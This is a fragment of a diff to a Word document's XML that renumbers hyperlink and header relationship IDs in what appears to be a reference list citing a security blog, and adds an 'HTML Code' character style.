-      <w:hyperlink r:id="rId38" w:history="1">
+      <w:hyperlink r:id="rId53" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7805,7 +10095,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Security Blog. Retrieved September 9, 2022, from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId39" w:history="1">
+      <w:hyperlink r:id="rId54" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7850,7 +10140,7 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId40"/>
+      <w:headerReference w:type="default" r:id="rId55"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -10418,6 +12708,19 @@
       <w:lang w:eastAsia="en-GB"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:styleId="HTMLCode">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="003574AF"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
